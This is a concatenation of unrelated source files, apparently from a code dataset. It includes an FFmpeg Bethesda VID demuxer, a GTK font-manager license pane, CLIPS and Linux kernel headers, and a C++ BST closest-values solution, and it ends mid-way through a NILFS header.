void w_restart_init(window_handle_t w, void *pixels); // Called from vm restart code to reattach window to win system void w_restart_attach( window_handle_t w ); // Get most bottom (background) window. Used to set scrren background pic. 
window_handle_t w_get_bg_window(void); // ----------------------------------------------------------------------- // Legacy? // ----------------------------------------------------------------------- #if !NEW_WINDOWS void w_update( drv_video_window_t *w ); #if !USE_ONLY_INDIRECT_PAINT void drv_video_winblt( drv_video_window_t *from ); #endif // USE_ONLY_INDIRECT_PAINT int w_titleWindowEventProcessor( window_handle_t w, struct ui_event *e ); /** * * Replicates src to dest. src has one horiz. line of srcSize pixels. * nSteps is number of replication steps vertically. * **/ void w_replicate_ver( window_handle_t dest, int destX, int destY, int nSteps, const rgba_t *src, int srcSize ); /** * * Replicates src to dest. src has one vert. line of srcSize pixels. * nSteps is number of times to draw src horizontally. * **/ void w_replicate_hor( window_handle_t dest, int destX, int destY, int nSteps, const rgba_t *src, int srcSize ); void window_basic_border( window_handle_t dest, const rgba_t *src, int srcSize, int isTitle ); #endif void w_repaint_screen_part( drv_video_window_t *w, rect_t *todo ); #if 0 #if NEW_WINDOWS typedef pool_handle_t window_handle_t; // ----------------------------------------------------------------------- // New windows attempt - outdated // ----------------------------------------------------------------------- typedef struct _phantom_window { int xsize; // physical int ysize; int x, y, z; // On screen int dx, dy; // Drag base (see titleMouseEventProcessor) //int unused_generation; // used to redraw self and borders on global events int flags; // Not supposed to change during window's life int state; // Can change anytime //queue_chain_t chain; // All windows are on this chain int li, ti, ri, bi; // insets rgba_t bg; // background color const char* title; //queue_head_t events; // Incoming events //volatile int events_count; // To prevent overfill of dead window q int stall; // True if event queue is overloaded and events are being lost /*! 
* Called from main event dispatch thread after event is placed to * window event queue. Supposed to process event or trigger waiting * thread to do that. */ int (*inKernelEventProcess)( window_handle_t, struct ui_event *e ); tid_t owner; //pool_handle_t w_title; // child window - title //pool_handle_t w_decor; // child window - decorations //pool_handle_t w_owner; // my parent window // bitmap itself rgba_t *pixel; } window_t; pool_handle_t w_create( int xsize, int ysize ); void w_blt( pool_handle_t h ); void w_draw_h_line( window_handle_t h, rgba_t color, int x, int y, int len ); void w_draw_v_line( window_handle_t h, rgba_t color, int x, int y, int len ); //void w_moveto( pool_handle_t h, int x, int y ); //void w_pixel( pool_handle_t h, int x, int y, rgba_t color ); #endif #endif #endif // WINDOW_H
{ "language": "C" }
/* * Bethsoft VID format Demuxer * Copyright (c) 2007 Nicholas Tung * * This file is part of FFmpeg. * * FFmpeg is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * FFmpeg is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with FFmpeg; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ /** * @file * @brief Bethesda Softworks VID (.vid) file demuxer * @author Nicholas Tung [ntung (at. ntung com] (2007-03) * @see http://wiki.multimedia.cx/index.php?title=Bethsoft_VID * @see http://www.svatopluk.com/andux/docs/dfvid.html */ #include "libavutil/channel_layout.h" #include "libavutil/intreadwrite.h" #include "avformat.h" #include "internal.h" #include "libavcodec/bethsoftvideo.h" #define BVID_PALETTE_SIZE 3 * 256 #define DEFAULT_SAMPLE_RATE 11111 typedef struct BVID_DemuxContext { int nframes; int sample_rate; /**< audio sample rate */ int width; /**< video width */ int height; /**< video height */ /** delay value between frames, added to individual frame delay. 
 * custom units, which will be added to other custom units (~=16ms according
 * to free, unofficial documentation) */
    int bethsoft_global_delay;

    int video_index;        /**< video stream index */
    int audio_index;        /**< audio stream index */
    int has_palette;
    uint8_t palette[BVID_PALETTE_SIZE];

    int is_finished;
} BVID_DemuxContext;

/**
 * Probe for the Bethesda Softworks VID format.
 * The container starts with the little-endian tag "VID\0"; a version byte
 * other than 2 lowers confidence to AVPROBE_SCORE_MAX / 4.
 */
static int vid_probe(const AVProbeData *p)
{
    // little-endian VID tag, file starts with "VID\0"
    if (AV_RL32(p->buf) != MKTAG('V', 'I', 'D', 0))
        return 0;

    if (p->buf[4] != 2)
        return AVPROBE_SCORE_MAX / 4;

    return AVPROBE_SCORE_MAX;
}

/**
 * Read the fixed VID file header and defer stream creation.
 * Streams are created lazily in vid_read_packet()/read_frame(), hence
 * AVFMTCTX_NOHEADER is set.  Returns 0 on success.
 */
static int vid_read_header(AVFormatContext *s)
{
    BVID_DemuxContext *vid = s->priv_data;
    AVIOContext *pb = s->pb;

    /* load main header. Contents:
     *    bytes: 'V' 'I' 'D'
     *    int16s: always_512, nframes, width, height, delay, always_14
     */
    avio_skip(pb, 5);
    vid->nframes = avio_rl16(pb);
    vid->width   = avio_rl16(pb);
    vid->height  = avio_rl16(pb);
    vid->bethsoft_global_delay = avio_rl16(pb);
    avio_rl16(pb);   // "always_14" field, value unused here

    // wait until the first packet to create each stream
    vid->video_index = -1;
    vid->audio_index = -1;
    vid->sample_rate = DEFAULT_SAMPLE_RATE;
    s->ctx_flags |= AVFMTCTX_NOHEADER;

    return 0;
}

#define BUFFER_PADDING_SIZE 1000

/**
 * Read one video frame block (I-frame, P-frame or P-frame with y offset)
 * into @pkt.  The raw block bytes (including the leading block-type byte
 * and optional 2-byte y offset) are accumulated into a growing buffer and
 * then copied into the packet; a pending palette, if any, is attached as
 * AV_PKT_DATA_PALETTE side data.  Returns 0 on success or a negative
 * AVERROR code.
 */
static int read_frame(BVID_DemuxContext *vid, AVIOContext *pb, AVPacket *pkt,
                      uint8_t block_type, AVFormatContext *s)
{
    uint8_t * vidbuf_start = NULL;
    int vidbuf_nbytes = 0;
    int code;
    int bytes_copied = 0;
    int position, duration, npixels;
    unsigned int vidbuf_capacity;
    int ret = 0;
    AVStream *st;

    if (vid->video_index < 0) {
        st = avformat_new_stream(s, NULL);
        if (!st)
            return AVERROR(ENOMEM);
        vid->video_index = st->index;
        if (vid->audio_index < 0) {
            avpriv_request_sample(s, "Using default video time base since "
                                  "having no audio packet before the first "
                                  "video packet");
        }
        /* time base 185/sample_rate: video delay units are expressed
         * relative to the audio sample rate */
        avpriv_set_pts_info(st, 64, 185, vid->sample_rate);
        st->codecpar->codec_type = AVMEDIA_TYPE_VIDEO;
        st->codecpar->codec_id   = AV_CODEC_ID_BETHSOFTVID;
        st->codecpar->width      = vid->width;
        st->codecpar->height     = vid->height;
    }
    st      = s->streams[vid->video_index];
    npixels = st->codecpar->width * st->codecpar->height;

    vidbuf_start = av_malloc(vidbuf_capacity = BUFFER_PADDING_SIZE);
    if(!vidbuf_start)
        return AVERROR(ENOMEM);

    // save the file position for the packet, include block type
    position = avio_tell(pb) - 1;

    vidbuf_start[vidbuf_nbytes++] = block_type;

    // get the current packet duration
    duration = vid->bethsoft_global_delay + avio_rl16(pb);

    // set the y offset if it exists (decoder header data should be in data section)
    if(block_type == VIDEO_YOFF_P_FRAME){
        if (avio_read(pb, &vidbuf_start[vidbuf_nbytes], 2) != 2) {
            ret = AVERROR(EIO);
            goto fail;
        }
        vidbuf_nbytes += 2;
    }

    /* RLE-style stream: codes >= 0x80 repeat one byte, other non-zero
     * codes copy that many literal bytes; 0 terminates the frame. */
    do{
        uint8_t *tmp = av_fast_realloc(vidbuf_start, &vidbuf_capacity,
                                       vidbuf_nbytes + BUFFER_PADDING_SIZE);
        if (!tmp) {
            ret = AVERROR(ENOMEM);
            goto fail;
        }
        vidbuf_start = tmp;

        code = avio_r8(pb);
        vidbuf_start[vidbuf_nbytes++] = code;

        if(code >= 0x80){ // rle sequence
            if(block_type == VIDEO_I_FRAME)
                vidbuf_start[vidbuf_nbytes++] = avio_r8(pb);
        } else if(code){ // plain sequence
            if (avio_read(pb, &vidbuf_start[vidbuf_nbytes], code) != code) {
                ret = AVERROR(EIO);
                goto fail;
            }
            vidbuf_nbytes += code;
        }
        bytes_copied += code & 0x7F;
        if(bytes_copied == npixels){ // sometimes no stop character is given, need to keep track of bytes copied
            // may contain a 0 byte even if read all pixels
            if(avio_r8(pb))
                avio_seek(pb, -1, SEEK_CUR);
            break;
        }
        if (bytes_copied > npixels) {
            ret = AVERROR_INVALIDDATA;
            goto fail;
        }
    } while(code);

    // copy data into packet
    if ((ret = av_new_packet(pkt, vidbuf_nbytes)) < 0)
        goto fail;
    memcpy(pkt->data, vidbuf_start, vidbuf_nbytes);

    pkt->pos = position;
    pkt->stream_index = vid->video_index;
    pkt->duration = duration;
    if (block_type == VIDEO_I_FRAME)
        pkt->flags |= AV_PKT_FLAG_KEY;

    /* if there is a new palette available, add it to packet side data */
    if (vid->has_palette) {
        uint8_t *pdata = av_packet_new_side_data(pkt, AV_PKT_DATA_PALETTE,
                                                 BVID_PALETTE_SIZE);
        if (!pdata) {
            ret = AVERROR(ENOMEM);
            av_log(s, AV_LOG_ERROR, "Failed to allocate palette side data\n");
            goto fail;
        }
        memcpy(pdata, vid->palette, BVID_PALETTE_SIZE);
        vid->has_palette = 0;
    }

    vid->nframes--;  // used to check if all the frames were read

fail:
    av_free(vidbuf_start);
    return ret;
}

/**
 * Demux one packet.  Dispatches on the leading block-type byte:
 * palette blocks are buffered (and the function recurses for the next
 * packet), audio blocks create/feed the audio stream, video blocks are
 * delegated to read_frame(), and the EOF block finishes the file.
 */
static int vid_read_packet(AVFormatContext *s,
                           AVPacket *pkt)
{
    BVID_DemuxContext *vid = s->priv_data;
    AVIOContext *pb = s->pb;
    unsigned char block_type;
    int audio_length;
    int ret_value;

    if(vid->is_finished || avio_feof(pb))
        return AVERROR_EOF;

    block_type = avio_r8(pb);
    switch(block_type){
        case PALETTE_BLOCK:
            if (vid->has_palette) {
                av_log(s, AV_LOG_WARNING, "discarding unused palette\n");
                vid->has_palette = 0;
            }
            if (avio_read(pb, vid->palette, BVID_PALETTE_SIZE) != BVID_PALETTE_SIZE) {
                return AVERROR(EIO);
            }
            vid->has_palette = 1;
            /* palette is attached to the next video packet; recurse once */
            return vid_read_packet(s, pkt);

        case FIRST_AUDIO_BLOCK:
            avio_rl16(pb);
            // soundblaster DAC used for sample rate, as on specification page (link above)
            vid->sample_rate = 1000000 / (256 - avio_r8(pb));
            /* fall through: the first audio block also carries audio data */
        case AUDIO_BLOCK:
            if (vid->audio_index < 0) {
                AVStream *st = avformat_new_stream(s, NULL);
                if (!st)
                    return AVERROR(ENOMEM);
                vid->audio_index                    = st->index;
                st->codecpar->codec_type            = AVMEDIA_TYPE_AUDIO;
                st->codecpar->codec_id              = AV_CODEC_ID_PCM_U8;
                st->codecpar->channels              = 1;
                st->codecpar->channel_layout        = AV_CH_LAYOUT_MONO;
                st->codecpar->bits_per_coded_sample = 8;
                st->codecpar->sample_rate           = vid->sample_rate;
                st->codecpar->bit_rate              = 8 * st->codecpar->sample_rate;
                st->start_time                      = 0;
                avpriv_set_pts_info(st, 64, 1, vid->sample_rate);
            }
            audio_length = avio_rl16(pb);
            if ((ret_value = av_get_packet(pb, pkt, audio_length)) != audio_length) {
                if (ret_value < 0)
                    return ret_value;
                av_log(s, AV_LOG_ERROR, "incomplete audio block\n");
                return AVERROR(EIO);
            }
            pkt->stream_index = vid->audio_index;
            pkt->duration     = audio_length;  // PCM u8 mono: 1 byte per sample
            pkt->flags |= AV_PKT_FLAG_KEY;
            return 0;

        case VIDEO_P_FRAME:
        case VIDEO_YOFF_P_FRAME:
        case VIDEO_I_FRAME:
            return read_frame(vid, pb, pkt, block_type, s);

        case EOF_BLOCK:
            if(vid->nframes != 0)
                av_log(s, AV_LOG_VERBOSE, "reached terminating character but not all frames read.\n");
            vid->is_finished = 1;
            return AVERROR(EIO);
        default:
            av_log(s, AV_LOG_ERROR, "unknown block (character = %c, decimal = %d, hex = %x)!!!\n",
                   block_type, block_type, block_type);
            return AVERROR_INVALIDDATA;
    }
}

AVInputFormat ff_bethsoftvid_demuxer = {
    .name           = "bethsoftvid",
    .long_name      = NULL_IF_CONFIG_SMALL("Bethesda Softworks VID"),
    .priv_data_size = sizeof(BVID_DemuxContext),
    .read_probe     = vid_probe,
    .read_header    = vid_read_header,
    .read_packet    = vid_read_packet,
};
{ "language": "C" }
   /*******************************************************/
   /*      "C" Language Integrated Production System      */
   /*                                                     */
   /*             CLIPS Version 6.24  06/05/06            */
   /*                                                     */
   /*           INCREMENTAL RESET HEADER FILE             */
   /*******************************************************/

/*************************************************************/
/* Purpose: Provides functionality for the incremental       */
/*   reset of the pattern and join networks when a new       */
/*   rule is added.                                          */
/*                                                           */
/* Principal Programmer(s):                                  */
/*      Gary D. Riley                                        */
/*                                                           */
/* Contributing Programmer(s):                               */
/*                                                           */
/* Revision History:                                         */
/*                                                           */
/*      6.24: Renamed BOOLEAN macro type to intBool.         */
/*                                                           */
/*************************************************************/

#ifndef _H_incrrset
#define _H_incrrset

#ifndef _H_ruledef
#include "ruledef.h"
#endif

/* LOCALE expands to nothing inside the translation unit that defines
 * these symbols (_INCRRSET_SOURCE_) and to "extern" everywhere else,
 * following the usual CLIPS header convention. */
#ifdef LOCALE
#undef LOCALE
#endif

#ifdef _INCRRSET_SOURCE_
#define LOCALE
#else
#define LOCALE extern
#endif

/* Convenience wrappers: when ENVIRONMENT_API_ONLY is set the caller must
 * pass an environment explicitly; otherwise the current environment is
 * supplied automatically. */
#if ENVIRONMENT_API_ONLY
#define GetIncrementalReset(theEnv) EnvGetIncrementalReset(theEnv)
#define SetIncrementalReset(theEnv,a) EnvSetIncrementalReset(theEnv,a)
#else
#define GetIncrementalReset() EnvGetIncrementalReset(GetCurrentEnvironment())
#define SetIncrementalReset(a) EnvSetIncrementalReset(GetCurrentEnvironment(),a)
#endif

LOCALE void                           IncrementalReset(void *,struct defrule *);
LOCALE intBool                        EnvGetIncrementalReset(void *);
LOCALE intBool                        EnvSetIncrementalReset(void *,intBool);
LOCALE int                            GetIncrementalResetCommand(void *);
LOCALE int                            SetIncrementalResetCommand(void *);

#endif
{ "language": "C" }
/* font-manager-license-pane.c
 *
 * Copyright (C) 2009 - 2020 Jerry Casiano
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.
 *
 * If not, see <http://www.gnu.org/licenses/gpl-3.0.txt>.
*/

#include "font-manager-license-pane.h"

/**
 * SECTION: font-manager-license-pane
 * @short_description: Font licensing details
 * @title: License Pane
 * @include: font-manager-license-pane.h
 *
 * Widget which displays embedded or detected font licensing data.
 */

struct _FontManagerLicensePane
{
    GtkEventBox parent_instance;

    gint        _fsType;        /* backing store for the "fstype" property */
    GtkWidget   *fsType;        /* bold label showing embedding permissions */
    GtkWidget   *license_data;  /* read-only GtkTextView with license text */
    GtkWidget   *license_url;   /* GtkLinkButton to the license URL */
    GtkWidget   *placeholder;   /* shown when no license data is present */
};

G_DEFINE_TYPE(FontManagerLicensePane, font_manager_license_pane, GTK_TYPE_EVENT_BOX)

enum
{
    PROP_RESERVED,
    PROP_FSTYPE,
    PROP_LICENSE_DATA,
    PROP_LICENSE_URL,
    N_PROPERTIES
};

static GParamSpec *obj_properties[N_PROPERTIES] = { NULL, };

static void
font_manager_license_pane_get_property (GObject *gobject,
                                        guint property_id,
                                        GValue *value,
                                        GParamSpec *pspec)
{
    g_return_if_fail(gobject != NULL);
    FontManagerLicensePane *self = FONT_MANAGER_LICENSE_PANE(gobject);
    g_autofree gchar *data = NULL;
    switch (property_id) {
        case PROP_FSTYPE:
            /* "fstype" is installed with g_param_spec_int() and written with
             * g_value_get_int() in set_property(); using g_value_set_enum()
             * here was a GValue type mismatch. */
            g_value_set_int(value, self->_fsType);
            break;
        case PROP_LICENSE_DATA:
            data = font_manager_license_pane_get_license_data(self);
            g_value_set_string(value, data);
            break;
        case PROP_LICENSE_URL:
            data = font_manager_license_pane_get_license_url(self);
            g_value_set_string(value, data);
            break;
        default:
            G_OBJECT_WARN_INVALID_PROPERTY_ID(gobject, property_id, pspec);
    }
    return;
}

static void
font_manager_license_pane_set_property (GObject *gobject,
                                        guint property_id,
                                        const GValue *value,
                                        GParamSpec *pspec)
{
    g_return_if_fail(gobject != NULL);
    FontManagerLicensePane *self = FONT_MANAGER_LICENSE_PANE(gobject);
    switch (property_id) {
        case PROP_FSTYPE:
            font_manager_license_pane_set_fsType(self, g_value_get_int(value));
            break;
        case PROP_LICENSE_DATA:
            font_manager_license_pane_set_license_data(self, g_value_get_string(value));
            break;
        case PROP_LICENSE_URL:
            font_manager_license_pane_set_license_url(self, g_value_get_string(value));
            break;
        default:
            G_OBJECT_WARN_INVALID_PROPERTY_ID(gobject, property_id, pspec);
    }
    return;
}

static void
font_manager_license_pane_class_init (FontManagerLicensePaneClass *klass)
{
    GObjectClass *object_class = G_OBJECT_CLASS(klass);
    object_class->get_property = font_manager_license_pane_get_property;
    object_class->set_property = font_manager_license_pane_set_property;

    /**
     * FontManagerLicensePane:fstype:
     *
     * Font embedding information
     */
    obj_properties[PROP_FSTYPE] = g_param_spec_int("fstype",
                                                   NULL,
                                                   "Font embedding information",
                                                   G_MININT, G_MAXINT, 0,
                                                   G_PARAM_STATIC_STRINGS |
                                                   G_PARAM_READWRITE |
                                                   G_PARAM_EXPLICIT_NOTIFY);

    /**
     * FontManagerLicensePane:license-data:
     *
     * Embedded or detected license text
     */
    obj_properties[PROP_LICENSE_DATA] = g_param_spec_string("license-data",
                                                            NULL,
                                                            "Embedded or detected license text",
                                                            NULL,
                                                            G_PARAM_STATIC_STRINGS |
                                                            G_PARAM_READWRITE |
                                                            G_PARAM_EXPLICIT_NOTIFY);

    /**
     * FontManagerLicensePane:license-url:
     *
     * Embedded or detected license url
     */
    obj_properties[PROP_LICENSE_URL] = g_param_spec_string("license-url",
                                                           NULL,
                                                           "Embedded or detected license url",
                                                           NULL,
                                                           G_PARAM_STATIC_STRINGS |
                                                           G_PARAM_READWRITE |
                                                           G_PARAM_EXPLICIT_NOTIFY);

    g_object_class_install_properties(object_class, N_PROPERTIES, obj_properties);
    return;
}

/* Resets the text window cursor to the default pointer so the license
 * text view does not show an I-beam; scroll events propagate normally. */
static gboolean
on_event (GtkWidget *widget, GdkEvent *event, G_GNUC_UNUSED gpointer user_data)
{
    g_return_val_if_fail(widget != NULL, GDK_EVENT_PROPAGATE);
    g_return_val_if_fail(event != NULL, GDK_EVENT_PROPAGATE);
    if (event->type == GDK_SCROLL)
        return GDK_EVENT_PROPAGATE;
    GdkWindow *text_window = gtk_text_view_get_window(GTK_TEXT_VIEW(widget), GTK_TEXT_WINDOW_TEXT);
    gdk_window_set_cursor(text_window, NULL);
    return GDK_EVENT_STOP;
}

static void
font_manager_license_pane_init (FontManagerLicensePane *self)
{
    g_return_if_fail(self != NULL);
    GtkStyleContext *ctx = gtk_widget_get_style_context(GTK_WIDGET(self));
    gtk_style_context_add_class(ctx, GTK_STYLE_CLASS_VIEW);
    gtk_widget_set_name(GTK_WIDGET(self), "FontManagerLicensePane");
    self->fsType = gtk_label_new(NULL);
    PangoAttrList *attrs = pango_attr_list_new();
    PangoAttribute *attr = pango_attr_weight_new(PANGO_WEIGHT_BOLD);
    pango_attr_list_insert(attrs, attr);
    gtk_label_set_attributes(GTK_LABEL(self->fsType), attrs);
    g_clear_pointer(&attrs, pango_attr_list_unref);
    gtk_widget_set_opacity(self->fsType, 0.55);
    const gchar *msg = _("File does not contain license information.");
    self->placeholder = font_manager_place_holder_new(NULL, NULL, msg, "dialog-question-symbolic");
    font_manager_widget_set_expand(self->placeholder, TRUE);
    font_manager_widget_set_margin(self->placeholder, FONT_MANAGER_DEFAULT_MARGIN * 4);
    gtk_widget_set_halign(self->placeholder, GTK_ALIGN_CENTER);
    gtk_widget_set_valign(self->placeholder, GTK_ALIGN_START);
    self->license_data = gtk_text_view_new();
    gtk_drag_dest_unset(self->license_data);
    g_signal_connect(self->license_data, "event", G_CALLBACK(on_event), NULL);
    self->license_url = gtk_link_button_new("");
    GtkWidget *overlay = gtk_overlay_new();
    gtk_overlay_add_overlay(GTK_OVERLAY(overlay), self->placeholder);
    gtk_text_view_set_wrap_mode(GTK_TEXT_VIEW(self->license_data), GTK_WRAP_WORD_CHAR);
    gtk_text_view_set_editable(GTK_TEXT_VIEW(self->license_data), FALSE);
    font_manager_widget_set_margin(self->fsType, FONT_MANAGER_DEFAULT_MARGIN * 2);
    font_manager_widget_set_margin(self->license_url, FONT_MANAGER_DEFAULT_MARGIN * 1.25);
    GtkWidget *scroll = gtk_scrolled_window_new(NULL, NULL);
    gtk_container_add(GTK_CONTAINER(scroll), self->license_data);
    font_manager_widget_set_expand(scroll, TRUE);
    font_manager_widget_set_margin(self->license_data, FONT_MANAGER_DEFAULT_MARGIN * 2);
    GtkWidget *box = gtk_box_new(GTK_ORIENTATION_VERTICAL, 2);
    gtk_box_pack_start(GTK_BOX(box), self->fsType, FALSE, FALSE, 0);
    gtk_container_add(GTK_CONTAINER(overlay), scroll);
    gtk_box_pack_start(GTK_BOX(box), overlay, TRUE, TRUE, 0);
    gtk_box_pack_end(GTK_BOX(box), self->license_url, FALSE, FALSE, 0);
    gtk_container_add(GTK_CONTAINER(self), box);
    gtk_widget_show(scroll);
    gtk_widget_show(self->fsType);
    gtk_widget_show(self->license_data);
    gtk_widget_show(self->license_url);
    gtk_widget_show(self->placeholder);
    gtk_widget_show(overlay);
    gtk_widget_show(box);
    return;
}

/**
 * font_manager_license_pane_get_fsType:
 * @self: #FontManagerLicensePane
 *
 * Returns: #FontManagerfsType
 */
gint
font_manager_license_pane_get_fsType (FontManagerLicensePane *self)
{
    g_return_val_if_fail(self != NULL, 0);
    return self->_fsType;
}

/**
 * font_manager_license_pane_get_license_data:
 * @self: #FontManagerLicensePane
 *
 * Returns: (transfer full) (nullable):
 * A newly allocated string that must be freed with #g_free or %NULL
 */
gchar *
font_manager_license_pane_get_license_data (FontManagerLicensePane *self)
{
    g_return_val_if_fail(self != NULL, NULL);
    GtkTextBuffer *buffer = gtk_text_view_get_buffer(GTK_TEXT_VIEW(self->license_data));
    GtkTextIter start, end;
    gtk_text_buffer_get_bounds(buffer, &start, &end);
    return gtk_text_buffer_get_text(buffer, &start, &end, FALSE);
}

/**
 * font_manager_license_pane_get_license_url:
 * @self: #FontManagerLicensePane
 *
 * Returns: (transfer full) (nullable):
 * A newly allocated string that must be freed with #g_free or %NULL
 */
gchar *
font_manager_license_pane_get_license_url (FontManagerLicensePane *self)
{
    g_return_val_if_fail(self != NULL, NULL);
    return g_strdup(gtk_link_button_get_uri(GTK_LINK_BUTTON(self->license_url)));
}

/**
 * font_manager_license_pane_set_fsType:
 * @self: #FontManagerLicensePane
 * @fstype: #FontManagerfsType
 */
void
font_manager_license_pane_set_fsType (FontManagerLicensePane *self, gint fstype)
{
    g_return_if_fail(self != NULL);
    self->_fsType = fstype;
    gtk_label_set_label(GTK_LABEL(self->fsType), font_manager_fsType_to_string(fstype));
    return;
}

/**
 * font_manager_license_pane_set_license_data:
 * @self: #FontManagerLicensePane
 * @license_data: (nullable): License data embedded in font file or %NULL
 */
void
font_manager_license_pane_set_license_data (FontManagerLicensePane *self, const gchar *license_data)
{
    g_return_if_fail(self != NULL);
    GtkTextBuffer *buffer = gtk_text_view_get_buffer(GTK_TEXT_VIEW(self->license_data));
    gtk_text_buffer_set_text(buffer, license_data ? license_data : "", -1);
    /* placeholder is only visible when there is no license text */
    gtk_widget_set_visible(self->placeholder, license_data == NULL);
    return;
}

/**
 * font_manager_license_pane_set_license_url:
 * @self: #FontManagerLicensePane
 * @url: (nullable): URL to latest version of license or %NULL
 */
void
font_manager_license_pane_set_license_url (FontManagerLicensePane *self, const gchar *url)
{
    g_return_if_fail(self != NULL);
    gtk_button_set_label(GTK_BUTTON(self->license_url), url);
    gtk_link_button_set_uri(GTK_LINK_BUTTON(self->license_url), url ? url : "");
    gtk_widget_set_visible(self->license_url, url != NULL);
    return;
}

/**
 * font_manager_license_pane_new:
 *
 * Returns: (transfer full): A newly created #FontManagerLicensePane.
 * Free the returned object using #g_object_unref().
 */
GtkWidget *
font_manager_license_pane_new (void)
{
    return g_object_new(FONT_MANAGER_TYPE_LICENSE_PANE, NULL);
}
{ "language": "C" }
/**
 * Definition for a binary tree node.
 * struct TreeNode {
 *     int val;
 *     TreeNode *left;
 *     TreeNode *right;
 *     TreeNode(int x) : val(x), left(NULL), right(NULL) {}
 * };
 */
// Finds the k BST values closest to target by maintaining two "cursors":
// the largest element <= target and the smallest element > target, then
// repeatedly taking whichever is closer and stepping it outward with
// predecessor/successor moves.  O(k) amortized after the initial descent,
// using a lazily-filled parent map instead of a parent pointer in the node.
class Solution {
public:
    // Debug helper: renders a node's value (or "null") as a string.
    string s(TreeNode* u) {
        if (u == nullptr) {
            return "null";
        } else {
            stringstream sin;
            sin << u->val;
            return sin.str();
        }
    }

    vector<int> closestKValues(TreeNode* root, double target, int k) {
        vector<int> answer;
        // left cursor: largest value <= target; right cursor: smallest > target.
        TreeNode* left = find1(root, target, nullptr);
        TreeNode* right = find2(root, target, nullptr);
        // NOTE(review): answer.size() is size_t vs int k — fine for the
        // problem's constraint k >= 0, but a signed/unsigned compare warning.
        while (answer.size() < k) {
            // At least one cursor must remain while fewer than k were taken
            // (problem guarantees k <= number of nodes).
            assert(left != nullptr || right != nullptr);
            if (left == nullptr) {
                answer.push_back(right->val);
                right = next(right);
                continue;
            }
            if (right == nullptr) {
                answer.push_back(left->val);
                left = prev(left);
                continue;
            }
            // Both not null: take the side closer to target.
            if (target - left->val < right->val - target) {
                answer.push_back(left->val);
                left = prev(left);
            } else {
                answer.push_back(right->val);
                right = next(right);
            }
        }
        return answer;
    }

    // Find largest element <= target; records parent links along the path.
    TreeNode* find1(TreeNode* u, double target, TreeNode* p) {
        if (u == nullptr) return nullptr;
        parent[u] = p;
        if (u->val > target) {
            return find1(u->left, target, u);
        } else {
            assert(u->val <= target);
            // I could be the largest element unless there is one on my right side.
            TreeNode* r = find1(u->right, target, u);
            return r != nullptr ? r : u;
        }
    }

    // Find smallest element > target; records parent links along the path.
    TreeNode* find2(TreeNode* u, double target, TreeNode* p) {
        if (u == nullptr) return nullptr;
        parent[u] = p;
        if (u->val <= target) {
            return find2(u->right, target, u);
        } else {
            assert(u->val > target);
            // I could be the smallest element unless there is one on my left.
            TreeNode* l = find2(u->left, target, u);
            return l != nullptr ? l : u;
        }
    }

    // Finds leftmost element in subtree rooted at u.
    TreeNode* leftmost(TreeNode* u) {
        while (u->left != nullptr) {
            parent[u->left] = u;
            u = u->left;
        }
        return u;
    }

    // Finds rightmost element in subtree rooted at u.
    TreeNode* rightmost(TreeNode* u) {
        while (u->right != nullptr) {
            parent[u->right] = u;
            u = u->right;
        }
        return u;
    }

    // Finds immediately next element (in-order successor) in tree.
    TreeNode* next(TreeNode* u) {
        if (u == nullptr) return nullptr;
        if (u->right != nullptr) {
            parent[u->right] = u;
            return leftmost(u->right);
        }
        // Go up and to the left as much as I want
        while (parent[u] != nullptr && parent[u]->right == u) {
            u = parent[u];
        }
        // Then go once up and to the right
        if (parent[u] != nullptr && parent[u]->left == u) {
            return parent[u];
        }
        return nullptr;
    }

    // Finds immediately previous element (in-order predecessor) in tree.
    TreeNode* prev(TreeNode* u) {
        if (u == nullptr) return nullptr;
        if (u->left != nullptr) {
            parent[u->left] = u;
            return rightmost(u->left);
        }
        // Go up and to the left as much as I want
        while (parent[u] != nullptr && parent[u]->left == u) {
            u = parent[u];
        }
        // Then go once up and to the left
        if (parent[u] != nullptr && parent[u]->right == u) {
            return parent[u];
        }
        return nullptr;
    }

private:
    // Lazily-populated parent links; filled during the initial descent and
    // extended as next()/prev() walk into fresh subtrees.
    unordered_map<TreeNode*, TreeNode*> parent;
};
{ "language": "C" }
/* SPDX-License-Identifier: GPL-2.0 OR MIT */
/* Copyright 2018-2019 Qiang Yu <yuq825@gmail.com> */

#ifndef __LIMA_BCAST_H__
#define __LIMA_BCAST_H__

struct lima_ip;
/* Forward declaration: lima_bcast_enable() takes a lima_device pointer.
 * Without it the struct tag would be scoped to that one prototype,
 * producing a "declared inside parameter list" warning and a distinct,
 * incompatible type. */
struct lima_device;

int lima_bcast_resume(struct lima_ip *ip);
void lima_bcast_suspend(struct lima_ip *ip);
int lima_bcast_init(struct lima_ip *ip);
void lima_bcast_fini(struct lima_ip *ip);

void lima_bcast_enable(struct lima_device *dev, int num_pp);

#endif
{ "language": "C" }
/*
 * ifile.h - NILFS inode file
 *
 * Copyright (C) 2006-2008 Nippon Telegraph and Telephone Corporation.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 *
 * Written by Amagai Yoshiji <amagai@osrg.net>
 * Revised by Ryusuke Konishi <ryusuke@osrg.net>
 *
 */

#ifndef _NILFS_IFILE_H
#define _NILFS_IFILE_H

#include <linux/fs.h>
#include <linux/buffer_head.h>
#include <linux/nilfs2_fs.h>
#include "mdt.h"
#include "alloc.h"

/*
